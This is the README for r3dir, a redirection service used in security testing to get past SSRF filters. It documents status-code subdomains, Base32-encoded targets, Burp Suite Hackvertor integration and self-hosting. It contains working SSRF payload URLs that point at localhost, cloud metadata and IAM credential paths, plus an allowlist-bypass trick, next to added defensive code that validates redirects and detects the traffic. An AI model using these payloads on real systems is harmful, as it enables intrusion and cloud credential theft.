
HTTP redirection service designed to help bypass SSRF filters. Integrated with Burp Suite.


Horlad/r3dir


Redirection service designed to help bypass SSRF filters that do not validate the redirect location. It allows you to:

  • Define the redirection target via URL parameters or subdomains;
  • Control HTTP response status codes;
  • Obfuscate the target URL with Base32 encoding;
  • Bypass some allowlist filters;
  • Support CORS preflight requests for headless browser redirects;
  • Integrate with Burp Suite with the help of Hackvertor tags.

Details about the HTTP-redirect features that matter in SSRF cases, and how to use them with the r3dir tool, can be found in my article.

The service currently runs at the r3dir.me domain and supports both HTTP and HTTPS.

Usage

r3dir provides two approaches to set redirection targets: parameter-based and domain-based.

Setting HTTP status code

Both approaches let you control the HTTP status code of the response via the first subdomain of the r3dir.me URL.

    302.r3dir.me -> 302 Found
    307.r3dir.me -> 307 Temporary Redirect
    200.r3dir.me -> 200 OK

When you connect to r3dir over HTTP (e.g., http://307.r3dir.me), any HTTP code in the 200..599 range can be used. However, because of TLS certificate limitations (see below), only 3XX, 200, 404 and 500 are available over HTTPS.

Parameter-based redirection

To define the redirection target via a URL parameter, use /--to/?url=.... This method works when you can supply a full URL as the SSRF payload without restrictions.

    # Redirects to http://localhost with `307 Temporary Redirect` status code
    https://307.r3dir.me/--to/?url=http://localhost

Domain-based redirection

Often you control only the host part of the URL when performing SSRF via an HTTP redirect. Existing tools require manual configuration of redirection targets in that case; r3dir instead lets you set the target dynamically via subdomains.

(Figure: r3dir decoding flow)

As the figure shows, the subdomains carry the Base32-encoded, compressed target, split across labels, which r3dir decodes to build the redirect.

To create an encoded domain, use the CLI tool or embed it in Burp Suite as a Hackvertor tag (see details below).

Length limit

The maximum domain length is 253 characters. Unishox2 compression (around 30-40% for common SSRF payloads) compensates for the Base32 expansion, so r3dir achieves roughly a 1-to-1 ratio for encoded targets on average, and targets of up to 230 characters can be used (allowing for the other parts of the domain).

HTTPS limitations

Because wildcard TLS certificates do not cover multiple wildcard levels (like *.*.301.r3dir.me), HTTPS domain-based redirection only works with targets that are no longer than 63 characters (the maximum length of one subdomain label) in encoded form. The --ignore_part feature is also unavailable over HTTPS for the same reason.

    # Redirects to http://169.254.169.254/latest/meta-data with `302 Found` status code
    https://62epax5fhvj3zzmzigyoe5ipkbn7fysllvges3a.302.r3dir.me

Bypassing weak allowlist filters

In addition, any subdomains before the -- subdomain are ignored. This lets you bypass some weak filters that only check for substring presence in a domain, and it works with both approaches.

    # Ignores `some.domain.to.ignore` part and redirects to http://169.254.169.254/latest/meta-data
    http://some.domain.to.ignore.--.62epax5fhvj3zzmzigyoe5ipkbn7fysllvges3a.302.r3dir.me
    # Ignores `some.domain.to.ignore` part and redirects to http://localhost
    http://some.domain.to.ignore.--.307.r3dir.me/--to/?url=http://localhost
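As an added defensive example (not r3dir's own code), the following Python shows the two server-side checks that the domain-based redirection and the `--` prefix above rely on being absent: re-validating every redirect hop instead of only the first URL, and matching allowlisted hosts on label boundaries rather than by substring presence. The resolver and HTTP fetcher are injected callables so the code runs without network access; `trusted.example`, the IP addresses and the responses in the fixtures are constructed, and `refusal_reason` is a helper written only for this demo.

```python
"""Redirect-aware SSRF target validation (added example; not r3dir's code).

Demonstrates the two server-side checks whose absence r3dir relies on:
  1. every hop of a redirect chain is validated, not only the first URL;
  2. allowlisted hosts are matched on label boundaries, not by substring.
The resolver and HTTP fetcher are injected callables, so this runs offline.
All hostnames, addresses and responses in the fixtures are constructed.
"""
import ipaddress
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import urljoin, urlsplit

Allowlist = Tuple[str, ...]
Resolver = Callable[[str], List[str]]
Fetcher = Callable[[str], Tuple[int, Dict[str, str]]]

# Ranges a user-driven server-side fetch should never reach: loopback,
# RFC 1918, link-local (covers the 169.254.169.254 metadata address) and
# the IPv6 equivalents.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "0.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10")]

def weak_host_check(host: str, allowlist: Allowlist) -> bool:
    """The filter style the '--' prefix defeats: substring presence only."""
    return any(a in host for a in allowlist)

def strict_host_check(host: str, allowlist: Allowlist) -> bool:
    """Exact match, or a suffix match that starts on a label boundary."""
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in allowlist)

def ip_is_blocked(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BLOCKED_NETWORKS)

def validate_url(url: str, allowlist: Allowlist, resolve: Resolver) -> Optional[str]:
    """Return None if the URL may be fetched, otherwise the refusal reason."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return f"scheme not allowed: {parts.scheme!r}"
    host = parts.hostname
    if not host:
        return "missing host"
    if not strict_host_check(host, allowlist):
        return f"host not allowlisted: {host}"
    for ip in resolve(host):          # check what the name actually points at
        if ip_is_blocked(ip):
            return f"{host} resolves to blocked address {ip}"
    return None

def fetch_validating_each_hop(url: str, allowlist: Allowlist, resolve: Resolver,
                              fetch: Fetcher, max_hops: int = 5) -> Tuple[str, int]:
    """Follow redirects by hand so each Location gets the same validation as
    the initial URL; returns (final_url, status) or raises ValueError."""
    for _ in range(max_hops + 1):
        reason = validate_url(url, allowlist, resolve)
        if reason is not None:
            raise ValueError(f"refused {url}: {reason}")
        status, headers = fetch(url)
        location = headers.get("Location")
        if 300 <= status < 400 and location:
            url = urljoin(url, location)  # relative Location values resolve too
            continue
        return url, status
    raise ValueError("too many redirects")

# ---- constructed fixtures (no network involved) ----------------------------
ALLOWLIST: Allowlist = ("trusted.example",)
FAKE_DNS = {
    "trusted.example": ["203.0.113.10"],
    "internal.trusted.example": ["10.0.0.5"],          # allowlisted name, private IP
    "trusted.example.--.307.r3dir.me": ["198.51.100.7"],
    "localhost": ["127.0.0.1"],
}
FAKE_HTTP = {
    "https://trusted.example/ok": (200, {}),
    "https://trusted.example/open-redirect": (302, {"Location": "http://localhost"}),
    "https://trusted.example.--.307.r3dir.me/--to/?url=http://localhost":
        (307, {"Location": "http://localhost"}),
    "http://localhost": (200, {}),
}

def fake_resolve(host: str) -> List[str]:
    return FAKE_DNS.get(host, [])

def fake_fetch(url: str) -> Tuple[int, Dict[str, str]]:
    return FAKE_HTTP[url]

def refusal_reason(url: str) -> Optional[str]:
    """Why the hardened client refuses `url` against the fixtures, or None."""
    try:
        fetch_validating_each_hop(url, ALLOWLIST, fake_resolve, fake_fetch)
    except ValueError as exc:
        return str(exc)
    return None

if __name__ == "__main__":
    bypass = "https://trusted.example.--.307.r3dir.me/--to/?url=http://localhost"
    host = urlsplit(bypass).hostname
    print("substring check accepts bypass host:", weak_host_check(host, ALLOWLIST))
    print("label-boundary check accepts it:    ", strict_host_check(host, ALLOWLIST))
    print("hardened client:", refusal_reason(bypass))
    print("open redirect on allowlisted host:", refusal_reason("https://trusted.example/open-redirect"))
    print("legitimate fetch:", fetch_validating_each_hop("https://trusted.example/ok",
                                                         ALLOWLIST, fake_resolve, fake_fetch))
```

The `open-redirect` fixture is the case that matters most: the first URL passes every check, and only validating the `Location` of the second hop stops the fetch from reaching localhost. Resolving the hostname and checking the addresses also catches allowlisted names that point at private space; a production client should additionally pin the resolved address for the actual connection so the name cannot be re-resolved between check and use.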

Automations with r3dir

To signal that a target URL is too long to encode, the CLI tool raises a TooLongTarget exception. For fuzzing in Burp Suite with the Hackvertor tag or other automations, the r3dir encoder has a "Slient Mode". Slient mode suppresses the TooLongTarget error and instead produces an "error domain" for the decoder that carries the SHA-1 hash of the long target.

    # Example of TooLongTarget error for HTTPS enforced encoding in Slient Mode
    $ r3dir encode http://169.254.169.254/latest/meta-data/iam/security-credentials/some_role -s --slient_mode
    too-long-target-2b57569cfddb7d6f61331e123da605c7573521c9.302.r3dir.me  # error-domain with SHA1 hash

The r3dir decoder parses such an "error domain" and responds with a 414 URI Too Long status code and a message like: The target length has been too long for encoder. Target's SHA-1: 2b57569cfddb7d6f61331e123da605c7573521c9.
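For the detection side, here is an added example (not part of r3dir) that scans constructed egress-proxy log lines for the hostname layout documented above: a Base32 label followed by a status-code label, the `--` ignore separator, the `/--to/?url=` path form, and the `too-long-target-<sha1>` error domain. `REDIRECTOR_DOMAINS` is an assumed local list of redirector domains you track; the log format and every line in `SAMPLE_LOG` are constructed. The structural traits are matched independently of the domain name, so the check also flags a self-hosted instance on a domain you do not know about.

```python
"""Egress-log detector for r3dir-style redirector hostnames (added example;
not part of r3dir). Built from the documented domain layout:
<base32 target>.<status code>.<base domain>, an optional '<ignored>.--.'
prefix, the '/--to/?url=' path form and the 'too-long-target-<sha1>' error
domain. REDIRECTOR_DOMAINS is an assumed local list, and the proxy log
format and every line in SAMPLE_LOG are constructed."""
import re
from typing import List, Tuple
from urllib.parse import urlsplit

REDIRECTOR_DOMAINS = ("r3dir.me",)                 # assumed: redirectors you track
BASE32_LABEL = re.compile(r"^[a-z2-7]{8,63}$")     # RFC 4648 alphabet, no padding
STATUS_LABEL = re.compile(r"^[2-5]\d\d$")          # 200..599 as a DNS label
ERROR_LABEL = re.compile(r"^too-long-target-[0-9a-f]{40}$")

def classify_host(host: str, path: str = "/") -> List[str]:
    """Return the r3dir-style traits seen in host/path (empty list = none)."""
    host = host.lower().rstrip(".")
    labels = host.split(".")
    traits: List[str] = []
    if any(host.endswith("." + d) for d in REDIRECTOR_DOMAINS):
        traits.append("known-redirector-domain")
    if "--" in labels:
        traits.append("ignore-prefix-separator")
    if path.startswith("/--to/"):
        traits.append("parameter-redirect-path")
    # layout <payload>.<status>.<base>.<tld>: the status label is third from the right
    if len(labels) >= 4 and STATUS_LABEL.match(labels[-3]):
        payload = labels[-4]
        if BASE32_LABEL.match(payload):
            traits.append("base32-encoded-target")
        elif ERROR_LABEL.match(payload):
            traits.append("too-long-target-error-domain")
    return traits

# constructed proxy log: "<timestamp> <client> <method> <url> <status>"
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.1.2.3 GET https://api.github.com/repos 200
2024-05-01T10:00:02Z 10.1.2.3 GET https://307.r3dir.me/--to/?url=http://localhost 307
2024-05-01T10:00:03Z 10.1.2.4 GET https://62epax5fhvj3zzmzigyoe5ipkbn7fysllvges3a.302.r3dir.me/ 302
2024-05-01T10:00:04Z 10.1.2.4 GET http://some.domain.to.ignore.--.62epax5fhvj3zzmzigyoe5ipkbn7fysllvges3a.302.r3dir.me/ 302
2024-05-01T10:00:05Z 10.1.2.5 GET https://too-long-target-2b57569cfddb7d6f61331e123da605c7573521c9.302.r3dir.me/ 414
2024-05-01T10:00:06Z 10.1.2.6 GET https://cdn.200.example.net/asset.js 200
"""

def scan_log(text: str) -> List[Tuple[str, List[str]]]:
    """Return (url, traits) for every log line that shows at least one trait."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue           # malformed line; skip rather than crash
        url = fields[3]
        parts = urlsplit(url)
        if not parts.hostname:
            continue
        traits = classify_host(parts.hostname, parts.path)
        if traits:
            hits.append((url, traits))
    return hits

if __name__ == "__main__":
    for url, traits in scan_log(SAMPLE_LOG):
        print(url, "->", ", ".join(traits))
```

The status-label rule is a heuristic: a three-digit label alone (as in the `cdn.200.example.net` line) is not enough to flag, so it is only reported together with a Base32-looking or error-domain payload label in front of it. Treat hits as leads for an investigation of the originating server-side fetch, not as proof of compromise.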

There is also a PyPI package that can be used as a library in your own Python scripts and tools. Details and usage examples are on the PyPI page.

CLI tool

Installation

pipx install r3dir

Encode mode

    $ r3dir encode -h
    usage: r3dir encode [-h] [-c STATUS_CODE] [-i IGNORE_PART|-s] [--slient_mode] target_url

    positional arguments:
      target_url            Target URL which r3dir tool should redirect to

    options:
      -h, --help            show this help message and exit
      -c STATUS_CODE, --status_code STATUS_CODE
                            HTTP status code of a redirect response (default: 302)
      -i IGNORE_PART, --ignore_part IGNORE_PART
                            String, which will be ignored during decoding. Used to bypass weak REGEXs
      -s, --https           HTTPS enforced encoding (TLS certificate length limitation)
      --slient_mode         Slient mode for automations (e.g Hackvertor tags)

Decode mode

    $ r3dir decode -h
    usage: r3dir decode [-h] encoded_domain

    positional arguments:
      encoded_domain  r3dir encoded domain to decode

    options:
      -h, --help      show this help message and exit

To use the CLI tool with your own server, set your domain with the -d option:

    $ r3dir -h
    usage: r3dir [-h] [-d MAIN_DOMAIN] {encode,decode,hackvertor} ...

    Encoded/decoder CLI tool for r3dir service

    options:
      -h, --help            show this help message and exit
      -d MAIN_DOMAIN, --main_domain MAIN_DOMAIN
                            Domain where r3dir tool is hosted on (default: r3dir.me)

    # Example of --main_domain option
    $ r3dir -d your.host encode http://localhost

Hackvertor tag

For seamless web application fuzzing, r3dir ships a custom Hackvertor tag for Burp Suite. If you haven't used the Hackvertor extension in Burp Suite before, check it out.

To install the r3dir Hackvertor tag in Burp Suite, follow these steps:

  1. Install the CLI tool:
     pip3 install r3dir
  2. Run r3dir hackvertor to copy the Hackvertor tags to the clipboard:
     • If you have set up your own server, use the -d option to set a custom main_domain for the Hackvertor tags.
       r3dir -d your.host hackvertor
     • If the CLI tool does not copy the tags to your clipboard, use the --print option to output them to the terminal and copy them manually.
       r3dir hackvertor --print
  3. Add the tag to the Hackvertor extension:
     • Open the Hackvertor menu in the Burp Suite sidebar and ensure that Allow code execution tags is enabled. Go to List custom tags.

(Screenshot: Hackvertor menu with List custom tags)

     • Then press Load tags from clipboard.

If you have your own custom tags, export them via Export all my tags to clipboard, add the r3dir tags to the exported JSON document and then reimport them.

HTTP server self-hosting

To spin up your own instance, follow these steps:

  1. Download the repository:
     git clone https://github.com/Horlad/r3dir.git
     cd r3dir

The out-of-the-box setup with Let's Encrypt wildcard TLS certificate auto-renewal (for HTTPS support) requires the service to be hosted on a DigitalOcean droplet with an added domain.

  2. Fill the environment file (.env) with your registered domain (APP_DOMAIN), a DigitalOcean API token with read and write scopes (DO_AUTH_TOKEN) and an email for Let's Encrypt (LETSENCRYPT_EMAIL):
     echo $'APP_DOMAIN=YOUR_DOMAIN\nDO_AUTH_TOKEN=DO_TOKEN\nLETSENCRYPT_EMAIL=YOUR@EMAIL.COM' > .env
  3. Docker Compose startup (Traefik + HTTP server):
     docker compose up -d

You can customize the Traefik configuration for different environments. Configuration contributions for other platforms are highly appreciated.

If you want to use a different HTTPS reverse proxy, you can instead run a standalone Docker container with the HTTP service on port 80.

  4. Standalone Docker container startup (HTTP server only):
     docker build . -t r3dir
     docker run -p 80:80 -e MAIN_DOMAIN=127.0.0.1.traefik.me r3dir
